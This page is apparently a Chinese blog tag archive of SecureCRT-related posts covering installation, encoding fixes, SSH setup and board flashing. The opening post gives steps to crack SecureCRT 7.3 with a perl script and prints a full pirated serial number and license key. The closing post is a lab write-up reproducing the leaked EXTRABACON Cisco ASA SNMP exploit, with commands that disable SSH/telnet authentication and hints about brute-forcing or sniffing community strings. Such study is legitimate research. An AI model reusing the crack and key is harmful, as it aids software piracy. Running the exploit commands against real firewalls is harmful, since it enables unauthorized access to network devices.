标签归档:securecrt

Ubuntu 14.10安装SecureCRT 7.3

Ubuntu 14.10下安装SecureCRT 7.3

1、软件准备

Ubuntu14.10 x64

SecureCRT7.3的版本:scrt-7.3.0-657.ubuntu13-64.x86_64.deb

下载地址:http://www.vandyke.com/download/securecrt/download.html

或到Linux公社1号服务器下载

——————————————分割线——————————————

FTP地址:ftp://ftp1.linuxidc.com

用户名:ftp1.linuxidc.com

密码:www.linuxidc.com

在 2014年LinuxIDC.com10月Sigma Metro风格图标主题 For Ubuntu

下载方法见 http://www.linuxidc.com/Linux/2013-10/91140.htm

——————————————分割线——————————————

2、安装SecureCRT

在终端下执行:

$sudo dpkg -i scrt-7.3.0-657.ubuntu13-64.x86_64.deb
[sudo]password for root:
Selectingpreviously unselected package scrt.

(正在读取数据库… 系统当前共安装有156411个文件和目录。)
Preparingto unpack scrt-7.3.0-657.ubuntu13-64.x86_64.deb …
Unpackingscrt (7.3.0-657) …
正在设置scrt(7.3.0-657) …
Processingtriggers for gnome-menus (3.10.1-0ubuntu2) …
Processingtriggers for desktop-file-utils (0.22-1ubuntu2) …
Processingtriggers for bamfdaemon (0.5.1+14.10.20140925-0ubuntu1) …
Rebuilding/usr/share/applications/bamf-2.index…
Processingtriggers for mime-support (3.55ubuntu1) …

3、破解

1)下载破解程序

——————————————分割线——————————————

免费下载地址在 http://linux.linuxidc.com/

用户名与密码都是www.linuxidc.com

具体下载目录在 /2014年资料/10月/30日/Ubuntu 14.10安装SecureCRT 7.3

下载方法见 http://www.linuxidc.com/Linux/2013-07/87684.htm

——————————————分割线——————————————

2)执行破解

$sudo perl securecrt_linux_crack.pl /usr/bin/SecureCRT
[sudo]password for root:
cracksuccessful

License:

Name: xiaobo_l
Company: www.boll.me
SerialNumber: 03-61-166978
LicenseKey: ABC89D UFDU94 C94CBU 7V17SU ABTUS5 QXX9E5 PF12H6 R62SHC
IssueDate: 12-22-2013

3)运行SecureCRT

弹出程序运行界面,在界面上选择EnterLicense Manually,手动输入以上注册内容。

注册成功,再无限制了。

Ubuntu 14.10安装SecureCRT 7.3

用SecureCRT 实现 WIN7 与 Linux 双向通信的问题及文件互传问题解决 http://www.linuxidc.com/Linux/2014-08/105412.htm

如何使用SecureCRT6.6.2通过SSH方式登录Ubuntu系统 http://www.linuxidc.com/Linux/2011-03/33024p4.htm

SecureCRT 连接 Ubuntu http://www.linuxidc.com/Linux/2013-06/85824.htm

Ubuntu 12.04 + 虚拟机VMware 9 + Secure CRT + EditPlus 本地C++开发环境搭建 http://www.linuxidc.com/Linux/2013-05/84820.htm

利用SecureCRT在Linux与Windows之间传输文件 http://www.linuxidc.com/Linux/2014-08/105413.htm

更多Ubuntu相关信息见Ubuntu 专题页面 http://www.linuxidc.com/topicnews.aspx?tid=2

SecureCRT使用Vim出现中文乱码问题的解决

<

div id=”content” contentScore=”1864″>在工作中经常需要使用到SecureCRT登录到linux环境去做一些文本处理的工作,因此就经常会遇到一些乱码问题,尤其是编辑的内容包含较多中文的情形,下面就是遇到类似问题的解决办法。

我遇到的所有乱码问题基本上都可以通过以下几种方式解决,写出来希望对大家有帮助。

1、设置linux字符集,如果是英文就设置成LANG=en_US.UTF-8,如果是中文就设置成LANG=zh_CN.UTF-8。设置完成以后可以使用locale查看设置的字符集。如下图所示:

2、设置SecureCRT的session的字符集问UTF-8,设置步骤如下:

首先点击【选项】选择【会话选项】如下图:

进入【会话选项】以后点击【外观】将字符编码设置成utf8,如下图所示:

经过上面两步能解决80%的乱码问题了,还有一种乱码问题是vim编辑含有中文的字符的时候的乱码问题,这种情况下一般使用cat命令不会有乱码。大家可以试一下,下面就来说说vim乱码的解决办法。

3、设置vim的字符集,为了确定是不是vim的字符集问题,可以vim 文件以后使用:set encoding=utf8看看能否正常显示。vim乱码的终极解决办法是更改vim的环境变量,具体的如下:

vi ~/.vimrc 添加set encoding=utf-8 fileencodings=ucs-bom,utf-8,cp936 然后保存,再vim 带中文的文件你就发现乱码问题没有了!哈哈!

总结:经过以上3步乱码问题基本上能得到解决,如果还有问题就用搜搜找找看吧!

相关阅读:

如何使用SecureCRT6.6.2通过SSH方式登录Ubuntu系统 http://www.linuxidc.com/Linux/2011-03/33024p4.htm

SecureCRT 连接 Ubuntu http://www.linuxidc.com/Linux/2013-06/85824.htm

Ubuntu 12.04 + 虼/div>

SSH连接虚拟机中的Ubuntu 12.0.4

摘要:主要是解决不能使用ssh远程Ubuntu的问题、使用的远程工具是putty、也可以使用xshell、ubunut12.0.4是装在虚拟机中的、不过这个应该没有什么影响。

一:问题的出现

前两天使用VMware装了一个ubuntu12.0.4之后、因为常常使用命令行、又喜欢在虚拟机与实体机中切来切去、感觉很不方便、就想在xp中远程ubuntu、遇到了点小意外、经过一会调试解决成功、把过程记录一下、好记性不如烂笔头。

在开始连接的时候、老是连接不成功、就想着具体是哪方面的问题、按照思路一步一步来验证。

二:具体的解决过程

1、网络

既然要远程ubuntu的系统、那么首先是两个网络是不是在一个网段、能不能ping的通?

a)  Windows电脑上——cmd 打开命令窗口、键入:ipconfig 命令、查看主机IP。

b)  ubuntu系统、ctrl + alt + F1打开命令终端、键入ifconfig 命令、查看ubuntu上网IP。

c)  然后在ubuntu系统终端键入:ping +Windows上网的IP、查看是否ping的通、不可以则检查网络情况、以及是否在一个网段、ping的通在进行下一步

d)  在Windows命令窗口中键入:ping +ubuntu 上网IP、查看是否ping的通、不可以则检查网络情况、以及是否在一个网段、ping的通在进行下一步

2、ssh服务

既然是通过sshserver来进行远程、那么当网路通畅之后要解决的就是关于ubuntu系统的ssh问题。

a)  查看是否安装ssh服务

在ubuntu终端命令界面键入:

ssh localhost

如果出现下面提示则表示还没有安装:

ssh: connect to hostlocalhost port 22: Connection refused 

 b)  安装ssh服务

如果通过上面步骤查看没有安装sshserver、则键入如下命令安装:

sudo apt-getinstall –y openssh-server 

c)安装完成后启动ssh

service ssh start 

d)  启动完成之后可以使用命令:ps –e | grep ssh 来查看ssh状态、

6455 ?        00:00:00 sshd 

则表明启动成功。

再使用putty连接ubuntu、问题解决。

1、PuTTY

推荐阅读:

如何通过Putty实现远程登录控制Linux平台 http://www.linuxidc.com/Linux/2013-06/85266.htm

Putty连接VMWare中Ubuntu的问题解决 http://www.linuxidc.com/Linux/2013-05/84819.htm

VMware+Linux+Putty环境配置 http://www.linuxidc.com/Linux/2013-05/84818.htm

借助Putty远程登录控制虚拟机的Fedora系统 http://www.linuxidc.com/Linux/2013-01/78155.htm

2、Xshell

secureCRT和Xshell登录Ubuntu http://www.linuxidc.com/Linux/2012-04/58745.htm

更多Ubuntu相关信息见Ubuntu

RHEL6.5 Beta版支持远程控制Windows 8系统

<

div id=”content” contentScore=”1998″>Red Hat已经宣布向所有客户和合作伙伴发布RHEL6.5 Beta版本

RHEL6.5包含对已有特性的各种升级,以及在订阅管理服务(Subscription Management Services)、可扩展性(scalability)、网络、存储、虚拟化、安全等方面提供新的功能。

Red Hat Logo

以下翻译自官方文档中的一段:

“为了跟上企业级架构的要求,最新版本提升了其可扩展性和易管理性的能力,以满足企业在横向扩展(build-out)的需求和管理庞大复杂的IT环境的需求。”

“举个例子,RHEL6.5通过优化SAP的配置,从而简化了对关键性业务SAP的操作。”

官方文档介绍,RHEL6.5完整集成了订阅管理服务,此服务在管理本地系统及其订阅服务方面非常有用。

Red Hat的开发人员介绍,用于记录内核崩溃信息的Kernel dump文件最大可以达到几个TB。用新的LZO压缩算法,RHEL能更快地产生Kernel dump文件。

最NB的功能之一是:RHEL6.5可以远程控制Win7/Win8/Win Server 2012,使用的是RDP(Remote Desktop Protocol,远程桌面协议)。

LibreOffice升级到4.0分支版本。众所周知,RHEL吸收的产品无一不是经过开发人员慎之又慎的挑选,确保其稳定性是长时间考验过的。基于这点,RHEL6.5吸收LibreOffice4.0不能不说是一个惊喜。

完整的release note可查看官方文档。

via: http://news.softpedia.com/news/Red-Hat-Enterprise-Linux-6-5-Beta-Can-Control-Windows-8-Installations-389761.shtml

本文由 LCTT 原创翻译,Linux中国 荣誉推出

译者:chenjintao 校对:wxy

更多RedHat相关信息见RedHat 专题页面 http://www.linuxidc.com/topicnews.aspx?tid=10

推荐阅读:

如何使用SecureCRT6.6.2通过SSH方式登录Ubuntu系统 http://www.linuxidc.com/Linux/2011-03/33024p4.htm

SecureCRT 连接 Ubuntu http://www.linuxidc.com/Linux/2013-06/85824.htm

Ubuntu 12.04 + 虼/div>

Linux下SSH端口更改&私钥公钥配置

ps:Ubuntu下更改SSH端口的方法

(一)修改SSH端口
1.1 修改/etc/ssh/sshd_config

Port 22        //ssh端口默认是22
Port 25680    //将端口号修改成25680
ps:在改某项服务端口的时候,最好先不要删除原来的端口号,以防影响别人的使用。先增加一个端口,测试通过之后,再将原来的端口号删除掉!
1.2 重启ssh服务,修改端口才生效
sudo /etc/init.d/ssh restart
1.3 用netstat -an 命令检验是否正确。
也可以通过SecureCRT等类似的工具登陆下,看能否通过新添加到端口登陆上。如果可以登陆上,再将原来的端口号22删掉。
(二)配置私钥和公钥
2.1 ssh-keygen -t dsa -P ” -f ~/.ssh/id_dsa
      cat ~/.ssh/id_dsa.pub >> ~/.ssh/authorized_keys
2.2 测试是否配置成功
    ssh localhost
ps:如果测试失败,可以尝试修改过相关目录的权限再尝试
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys

2.3 将公钥文件拷贝到远程服务器
1. 方法一:
cat ~/.ssh/id_dsa.pub | ssh 远程用户名@远程服务器ip -p 端口号 ‘cat – >> ~/.ssh/authorized_keys’
2. 方法二:
本地执行:
scp -p 端口号 ~/.ssh/id_dsa.pub 远程用户名@ip:/home/远程用户名/
登陆远程服务器  远程用户名@ip后执行:
cat id_dsa.pub >> ~/.ssh/authorized_keys
ps:如果测试不成功,需要改远程服务器IP上的文件authorized_keys的权限(权限的设置非常重要,因为不安全的设置安全设置,会让我们不能使用RSA功能)

想法
1.能不能将端口号改掉之后,仍然可以不用输入端口号就可以直接ssh登陆上去?ps:好像不能!

CentOS 下SSH无密码登录的配置 http://www.linuxidc.com/Linux/2012-05/61346.htm

Linux下实现SSH无密码验证登陆 http://www.linuxidc.com/Linux/2014-01/95917.htm

Ubuntu和CentOS如何配置SSH使得无密码登陆 http://www.linuxidc.com/Linux/2014-01/94794.htm

更多Ubuntu相关信息见Ubuntu

重新烧写Linux的uboot、内核、文件系统

这几天一直在做Linux有关的移植,一直在自己的笔记本上做,为了减少对SecureCRT和DNW的联合使用的干扰,DNW软件下载了好几个,但就是不成功……。最后,在一台式电脑上操作,开始时不能准确两者之间的协调,烧了好几遍,不成功。最终,明白了两者之间的配合,成功。

事发—烧写测试程序导致nand方式下白屏,norflash 下正常。

自己烧写TQ2440_Test.bin(nor下载模式,连接上SecureCRT、DNW,二者配置见开发板的说明书),由于第一次烧写,连接成功SecureCRT后,选择a:download user program(eg,ucos-II or TQ2440_Test),但提示USB host is not connected yet.即使对DNW选上连接,DNW也没连上。自己就把SecureCRT断开,连接DNW,试了好几个DNW版本的软件,连接上了,重启开发板,进入nor flash 下载模式,选择a:download user program(eg,ucos-II or TQ2440_Test),选择发送,找到文件针对此发送烧写,但nand模式下白屏了。(nor flash下下载模式正常。)自己就只用DNW软件在nor flash 模式下,(1)选择9 format the nandflash,再选1,再选y,再选q,返回目录;(2)选1 download U-boot or STepldr.nb/or other bootloader to nandflash;(3)选择3 download linux kernal to nand flash;(4)选b download logo picture(.bin)to nandflash ;(5)选6 download ysffs image to nand flsh;(6)选8 boot the system.自己在笔记本上忙活了近两天时间,这两天一直在做这样的事,但 不成功。

做错的原因:用到串口能不用笔记本(USB转串口)最好别用,很难伺候;没能使SecureCRT与DNW配置好。

正确步骤:

1、配置好SecureCRT、DNW(见开发板使用说明),DNW地址为0x3000000.(3后7个0)

2、使用台式机,没打开ARM板电源时,连接好串口线及USB下载线,www.linuxidc.com打开SecureCRT,选择开发板norflash 模式,再打开开发板电源。

3、(1)选择9 format the nandflash,再选1,再选y,再选q,返回目录;

(2)选1 download U-boot or STepldr.nb/or other bootloader to nandflash;此时SecureCRT下显示USB连接OK,waitting for downloading。这时双击DNW,打开该软件,(不用选择连接)直接选择USB菜单下的发送,找到光盘1\TQ2440_CD\出厂烧录镜像合集\东华3.5寸屏的镜像\U-boot,选择u-boot_W35_20091031.bin点击打开,进入烧写。此时看到SecureCRT中会出现内容。

(3)上一步完成后会进入menu,选择3 download linux kernal to nand flash,DNW选择USB菜单下的发送,找到光盘1\TQ2440_CD\出厂烧录镜像合集\东华3.5寸屏的镜像\Linux-2.6.30.4的zImage_2.6.30.4_W35_256M_20091030.bin,点击打开,进入烧写模式。

(4)上一步完成后会进入menu,选b download logo picture(.bin)to nandflash ;选光盘1\TQ2440_CD\出厂烧录镜像合集\东华3.5寸屏的镜像\Logo的logo_320_240.bin文件

(5)上一步完成后会进入menu,选6 download ysffs image to nand flsh;选光盘1\TQ2440_CD\出厂烧录镜像合集\Linux文件系统镜像的root_qtopia_2.2.0_2.6.30.4_256MB_20091216.bin。

(6)上一步完成后会进入menu,选8 boot the system。

完成后会校对触摸屏,到此烧写

SecureCRT中文编码乱码解决

1、mysql表和列都已经设置UTF-8了,然后还是不能输入中文和中文显示乱码。

2、在SecureCRT下:

  执行英文设置:export LANG=zh_CN.UTF-8后不能直接输入中文。

  然后执行中文设置:export LANG=zh_CN.GB2312(或者GB18030)后,可以输入中文,不过大多中文也是乱码;并且由于Linux系统字符集设置为GB和mysql的UTF-8不同,还会报错(ERROR 1366 (HY000): Incorrect string value: ‘xB1xB1xBExA9’ for column ‘CityName’)。

3、最后Linux系统设置为zh_CN.UTF-8,考虑是不是工具的问题,所以查看SecureCRT,修改字符编码得以解决问题。 选项—->会话选项—–>外观—–>字符编码(选择UTF-8)。

  

 

 

  

SecureCRT 连接VirtualBox 中的Ubuntu -端口转发  http://www.linuxidc.com/Linux/2015-12/126258.htm

用SecureCRT 实现 WIN7 与 Linux 双向通信的问题及文件互传问题解决 http://www.linuxidc.com/Linux/2014-08/105412.htm

如何使用SecureCRT6.6.2通过SSH方式登录Ubuntu系统 http://www.linuxidc.com/Linux/2011-03/33024p4.htm

SecureCRT 连接 Ubuntu http://www.linuxidc.com/Linux/2013-06/85824.htm

Ubuntu 12.04 + 虚拟机VMware 9 + Secure CRT + EditPlus 本地C++开发环境搭建 http://www.linuxidc.com/Linux/2013-05/84820.htm

利用SecureCRT在Linux与Windows之间传输文件 http://www.linuxidc.com/Linux/2014-08/105413.htm

Ubuntu 14.10安装SecureCRT 7.3 http://www.linuxidc.com/Linux/2014-10/108709.htm

SecureCRT 的详细介绍请点这里
SecureCRT 的下载地址请点这里

Win7 VMware Ubuntu虚拟机连接SecureCRT及ftp传输文件

一、安装VMware没有问题,网络设置以NAT方式(VMnet8是vmware专属的虚拟网卡)。安装完毕后设置虚拟机的VirtualNetworkEditor(可以再开始->所有程序VMware安装文件夹中找到)WMnet8不能和PC主机处于同一网段.

Win7 VMware Ubuntu虚拟机连接SecureCRT及ftp传输文件

设置好以后没有对网络连接中的VMnet8

Win7 VMware Ubuntu虚拟机连接SecureCRT及ftp传输文件

进行IP设置,Ubuntu中的网络连接设定的是自动获取

Win7 VMware Ubuntu虚拟机连接SecureCRT及ftp传输文件

到这ubuntu可以连接到外网,WIN7可以ping通ubuntu但ubuntu却ping不通WIN7.经过强大的google可知ubuntu的防火墙需要关闭

Win7 VMware Ubuntu虚拟机连接SecureCRT及ftp传输文件

注意权限,到这互相可以Ping通,获取ubuntu的IP命令为ifconfig

Win7 VMware Ubuntu虚拟机连接SecureCRT及ftp传输文件

Win7 VMware Ubuntu虚拟机连接SecureCRT及ftp传输文件

Win7 VMware Ubuntu虚拟机连接SecureCRT及ftp传输文件

到此第一部分完成但是secureCRT还是不能用的。。。转战第二部分。。。

更多详情见请继续阅读下一页的精彩内容http://www.linuxidc.com/Linux/2013-11/92541p2.htm

相关阅读

SecureCRT 7.0 通过 SSH服务登录 Vmware 下的Ubuntu 12.04服务器 http://www.linuxidc.com/Linux/2013-08/88638.htm

SecureCRT 连接 Ubuntu http://www.linuxidc.com/Linux/2013-06/85824.htm

SecureCRT 在Linux下有趣的小技巧 http://www.linuxidc.com/Linux/2013-04/83353.htm

解决SecureCRT报“Generic clipboard failure”错误 http://www.linuxidc.com/Linux/2013-02/79713.htm

SecureCRT 登陆虚拟机中Ubuntu详解 http://www.linuxidc.com/Linux/2013-01/78172.htm

SecureCRT连接虚拟机里Ubuntu

我是用的是SecureCRT,远程连接我的虚拟机里面的Ubuntu。直接报错,连接不上。

1,先分别在Windows上ipconfig和Ubuntu上ifconfig下

互ping一下,是可以ping通的

2,Ubuntu上ssh localhost

c0939313-7652-4098-9be7-c26da730681d

发现时没有ssh服务

3.执行命令

sudo apt-get install openssh-server

5c333e2e-5fe0-4328-886c-6cf4695fcddc

da817ef3-9941-49fa-a216-773b05689b14

重新ssh一下

ssh localhost

bb1fca0e-a1a2-4759-9207-db3c95765abd

现在是可以了的,至此理论上应该好了

打开刚才的链接

ed156c77-71ac-419e-813b-1dccc0b78f34

修改下用户名为我的用户名joy,输入密码

继续报错????

e99f8d4b-8412-4102-908c-93d5ab83c135

看看提示信息

我重新连接一下

注意图片中的用户名

0f49e7f5-f867-416b-86d5-2c49ea7b8738

8d938000-e441-4c0d-b741-f5532ab02e6c

登陆成功

f080d620-5a4c-4bcd-a3fc-b446b9937ea8

看来刚才那个错误是SecureCRT的用户名输入导致的

其实还有更深层次的原因可以探讨,不同用户类型登陆的问题,请自行研究。

SecureCRT 连接VirtualBox 中的Ubuntu -端口转发  http://www.linuxidc.com/Linux/2015-12/126258.htm

用SecureCRT 实现 WIN7 与 Linux 双向通信的问题及文件互传问题解决 http://www.linuxidc.com/Linux/2014-08/105412.htm

如何使用SecureCRT6.6.2通过SSH方式登录Ubuntu系统 http://www.linuxidc.com/Linux/2011-03/33024p4.htm

SecureCRT 连接 Ubuntu http://www.linuxidc.com/Linux/2013-06/85824.htm

Ubuntu 12.04 + 虚拟机VMware 9 + Secure CRT + EditPlus 本地C++开发环境搭建 http://www.linuxidc.com/Linux/2013-05/84820.htm

利用SecureCRT在Linux与Windows之间传输文件 http://www.linuxidc.com/Linux/2014-08/105413.htm

Ubuntu 14.10安装SecureCRT 7.3 http://www.linuxidc.com/Linux/2014-10/108709.htm

SecureCRT 的详细介绍请点这里
SecureCRT 的下载地址请点这里

更多Ubuntu相关信息见Ubuntu 专题页面 http://www.linuxidc.com/topicnews.aspx?tid=2

Cisco SNMP RCE漏洞复现过程

*本文原创作者:tahf,本文属FreeBuf原创奖励计划,未经许可禁止转载

NSA数据泄露后,很多大牛都给出了分析报告,让我受益匪浅。作为一名技术小白,想分享下分析\eqgrp-free-file\Firewall\EXPLOITS\EXBA的思路、搭建漏洞环境的过程和利用条件测试。本文具有极强的可操作性,请勿用于非法途径。由于个人技术水平有限,文中可能还有部分问题和错误,还请各位大牛批评指正,欢迎交流!

0×00 最初的线索和资源分享

获得泄露文件epgrp-free-file后,对Firewall\EXPLOITS\文件夹下的内容很感兴趣,但子文件夹名称对应的漏洞信息并不清楚。我们最关注的问题是这些漏洞利用工具的目标设备是什么,哪些版本受到漏洞影响,并且能否还原漏洞利用过程。对漏洞的成功复现是漏洞分析过程中非常重要的一步。

在分析过程中,注意到Firewall\SCRIPTS\目录下存有部分关于漏洞利用工具的相关说明。比如EXTRABACON.txt,含有对EXBA下extrabacon_1.1.0.1.py漏洞利用脚本的相关说明。

明确目标是Cisco的ASA,版本v8.0-v8.4。由于是SNMP漏洞,需要ASA防火墙开启SNMP服务。下一步我们需要搭建目标设备环境。由于手头上没有实物的ASA防火墙,所以我使用了基于VMware的ASA 8.42防火墙模拟器。为方便搭建环境,一并将资源和相关工具分享给大家。

ASA-8.42.rar(模拟ASA 5520,内含ASDM)

链接: https://pan.baidu.com/s/1dFzBqfv 密码: si9c

SecureCRT_win7.3.rar(C_R_T_7.3.rar)解压密码:CRT7.3

链接: https://pan.baidu.com/s/1bp3Jfvp 密码: yaq2

named pipe tcp proxy.zip

链接: https://pan.baidu.com/s/1jIdMvpO 密码: riw6

0×01 搭建ASA环境

使用VMware Workstation加载ASA-8.4.2虚拟机。建议首先修改虚拟机的配置,将桥接模式的网卡改成NAT模式,方便与其它虚拟机组网。同时,请查看下串行端口是否配置,默认配置为 \.\pipe\842 。如果串口没有配置,可以点击添加串行端口,选择“输出到命名管道”。下一步按照下图配置即可。

安装named pipe tcp proxy软件,并按照下图配置,功能是将串行端口命名管道数据转发到TCP端口上。

填入在ASA虚拟机配置的串行端口命名管道,Port选择一个本机没被占用的TCP端口。

安装SecureCRT软件并打开,新建一个Session,在协议中选择Telnet,点击下一步。

Hostname填入127.0.0.1,端口填入named Pipe Tcp Proxy中配置的端口,点击下一步。

Session Name任意填写,将作为一个标识,点击完成。

打开ASA-842虚拟机电源,稍等片刻后,双击刚配置好的Session Name,如果右侧终端显示ciscoasa>就说明前面的配置没有问题,现在相当是使用串口线连接ASA防火墙,下面开始配置ASA防火墙。该ASA镜像默认用户是netemu,密码和enable密码也是netemu。

ciscoasa>en
Password:******  (密码是netemu)
ciscoasa#show run          查看下现在的配置
……
interface GigabitEthernet0
 nameif inside
 security-level 100
 ip address 192.168.1.4 255.255.255.0 
……
http server enable
http 192.168.1.0 255.255.255.0 inside
no snmp-server location
no snmp-server contact
snmp-server enable traps snmp authentication linkup linkdown coldstart warmstart
……

主要目的是复现漏洞,因此只需要根据自己的网络环境做相应配置即可。如果对防火墙配置不熟悉,可以参考下面的配置命令。

配置IP地址,为inside区域:

ciscoasa# configure terminal 
ciscoasa(config)# interface GigabitEthernet0
ciscoasa(config-if)# ip address 10.0.27.250 255.255.255.0        (配置该网卡IP为10.0.27.250)
ciscoasa(config-if)# no shut
ciscoasa(config-if)# nameif inside

配置完成后,使用宿主机应该可以ping通10.0.27.250。

为方便大家配置ASA防火墙,该镜像中装载有ASDM 6.4.9,只需要把Web管理方式打开,就可以使用ASDM管理和配置ASA了。

PS:有些镜像是不带ASDM的,需要自己使用tftp把ASDM的bin文件上传。

配置http/https管理方式:

ciscoasa# configure terminal 
ciscoasa(config)# http server enable 
ciscoasa(config)# http 10.0.27.0 255.255.255.0 inside

然后使用浏览器访问 https://10.0.27.250 ,界面如下:

点击Install ASDMlauncher,下载并安装msi文件,需要安装有JRE环境。安装完成后可以在C:\ProgramFiles (x86)\Cisco Systems\ASDM\下,双击asdm-launcher.jar启动ASDM客户端。输入IP、用户名和密码,即可登录防火墙管理界面。

ASA最最基本的配置已经完成,别忘了使用write memory命令来保存之前的配置,否则断电就白配置了。

0×02 漏洞复现

继续阅读EXTRABACON.txt文件。

根据该文件,目标防火墙需要开启22(ssh)或者23(telnet)管理端口,并且需要开启snmp-server。在确认目标防火墙22或者23端口开放后(通过端口扫描),我们可以使用extrabacon_1.1.0.1.py脚本的info参数对目标udp 161端口进行探测,并尝试获取需要的目标版本信息。

python extrabacon_1.1.0.1.py info -t 10.0.27.250 -c public

我们先来配置ssh和telnet管理方式,使ASA防火墙的22和23端口开放。

ssh管理配置:

ciscoasa# configure terminal 
ciscoasa(config)# crypto key generate rsa modulus 1024
INFO: The name for the keys will be: 
Keypair generation process begin. Please wait...
ciscoasa(config)# write memory
ciscoasa(config)# ssh 10.0.27.0 255.255.255.0 inside
ciscoasa(config)# aaa authentication ssh console LOCAL

telnet管理配置:

ciscoasa# configure terminal 
ciscoasa(config)# telnet 10.0.27.0 255.255.255.0 inside

配置完成后,可以使用putty以ssh或telnet的方式登陆防火墙,注意在未使用漏洞利用工具前登陆是需要输入用户名和密码的,输入enable后还需要输入enable密码。

也可以直接通过ASDM图形化界面完成上述配置,如上图。ssh和telnet配置完成后,我们先尝试使用extrabacon_1.1.0.1.py脚本探测下防火墙的udp 161端口。请直接把EXBA整个文件夹拷贝到Kali虚拟机中使用。

发送了一个snmp协议中get-request请求,version是v2c,但防火墙没有任何响应。

防火墙默认是没有开启snmp-server的,现在让我们配置下。

ciscoasa# configure terminal 
ciscoasa(config)# snmp-server host inside 10.0.27.133 community public

简单网络管理协议SNMP,ASA 支持的版本v1 v2c v3,所有的访问都必须认证。

v1和v2 版本是基于IP 地址和Community进行认证,而v3版本使用用户名和密码进行认证。

如果有兴趣深入了解,可参考 http://www.cnblogs.com/xdp-gacl/p/3978825.html

上面输入的snmp-server host inside 10.0.27.133 community public配置命令,反映在ASDM图形化管理界面上如上图所示,也可以直接使用ASDM配置snmp-server。在extrabacon_1.1.0.1.py脚本中可以看到其支持的协议版本(only v2c),而v1和v2的认证是基于IP和Community,由于extrabacon_1.1.0.1.py脚本在Kali上运行,需要将host inside后面的IP设置为Kali虚拟机的IP地址,community相当于认证使用的密码,这里设置为public。snmp-server配置完成后,我们再使用脚本的info参数探测下ASA的udp 161端口。

python extrabacon_1.1.0.1.py info -t 10.0.27.250 -c public

这次ASA给出了响应包,get-response数据包中包含了ASA的版本及hostname。同时漏洞利用脚本回显的最后几行给出了下一步需要执行的命令。—mode pass-disable的参数反映出该利用工具预期达到的效果,关闭防火墙对telnet或者ssh管理方式的认证,允许攻击者通过连接不需要验证的管理接口进行未授权操作。

新产生的/EXBA/keys/LZueXn.key文件,只是用来标识目标防火墙版本。

利用脚本会根据key文件中的版本在/EXBA/version/目录下选择对应的shellcode,来生成payload数据包。

复现漏洞的时刻到了!

python extrabacon_1.1.0.1.py exec -k LZUeXn -t 10.0.27.250 -c public --mode pass-disable
python extrabacon_1.1.0.1.py exec -t 10.0.27.250 -c public --mode pass-disable
如果不加参数-k,脚本将首先自动进行info探测,获取目标版本信息后,再进行漏洞利用。

从key文件读取版本,选择对应版本shellcode,生成snmp协议的getBulkRequest请求数据包并发送。脚本执行成功后,使用putty以ssh或telnet的方式登陆下ASA防火墙,使用任意用户名和密码。并输入enable,密码任意,可以进行未授权操作,漏洞利用成功。

如果需要恢复认证,可以执行:

python extrabacon_1.1.0.1.py exec -k LZUeXn -t 10.0.27.250 -c public --mode pass-enable

0×03 利用条件测试

漏洞复现的环境搭建工作到此基本结束,但我继续做了下面的部分测试,来探讨该漏洞的利用条件。

因为在漏洞脚本利用前,我使用ASDM管理ASA,并且在漏洞利用全过程中没有断开ASDM的连接。在成功执行–mode pass-disable后,我在snmp配置界面做了一些更改,但点击Apply后发现报错,无法对snmp界面的Host Access List进行任何修改,见下图。同时尝试在其它配置面板对ASA更改其它配置,依然报错,已无法使用ASDM对ASA进行配置。

将ASDM退出后,再次连接ASA,登陆时再次报错,见下图,此时已无法使用ASDM连接ASA。

根据报错信息,怀疑漏洞利用的shellcode对privilege level进行了修改,还需要进一步验证。

只有再次利用脚本执行–mode pass-enable恢复认证后,才能使用ASDM管理ASA。可以预见的是,如果管理员正在使用ASDM配置管理ASA防火墙,利用该漏洞攻击是非常容易暴露的。

由于snmp v2版本是基于IP和Community字符串认证的,使该漏洞的利用条件变的比较苛刻。先来看基于IP的认证。

ciscoasa(config)#snmp-server host inside 10.0.27.133 community public

通过ASDM配置snmp服务时,Host Access Entry中的IP Address会进行合法性检查,只能填入单个IP。

如果该IP与发送snmp请求包的IP地址不符,snmp服务将不予响应。经过测试,IP不符的情况下,漏洞利用脚本无法获取目标版本信息,强行指定版本进行漏洞利用也无法成功。下图是发送的版本信息探测数据包和payload数据包,ASA snmp服务均没有任何响应。

在理想条件下,假设执行漏洞利用脚本的主机恰好在snmp的Host Access Entry列表中,那么还将面临Community的认证。如果配置snmp-server的Community事先不知道,或者不是大家常用的public这种。漏洞利用脚本的-c参数将很难填写。经过测试,在-c参数后面的Community与ASA snmp-server配置的Community不符合的情况下,漏洞利用工具将无法获得目标版本信息,漏洞无法成功利用。当然,可以尝试爆破snmp的Community。也可以利用v1,v2协议数据没有经过加密处理而对网络进行嗅探。

综上所述,该漏洞成功利用的条件如下:

1、目标防火墙开启22(ssh)或23(telnet)管理方式
2、目标配置了snmp服务。并且snmp配置中的Host Access Entry IP地址和Community字符串能够获得或者已知。
3、目标版本在8.X-8.4.4之间。
请考虑管理员是否正在使用ASDM对防火墙进行管理和配置。

手里还有FGT-VM-4.00-FW-build521的环境,下一步想分析Exploits\EGBL\目录。作为一名技术小白,编写本文的目的就是抛砖引玉,希望能交流更细节的东西,也想帮助大家尽快搭建起ASA的测试环境,便于进一步漏洞的分析。期待与大家一起交流学习,共同进步!

*本文原创作者:tahf,本文属FreeBuf原创奖励计划,未经许可禁止转载

更多文章请点击http://go2live.cn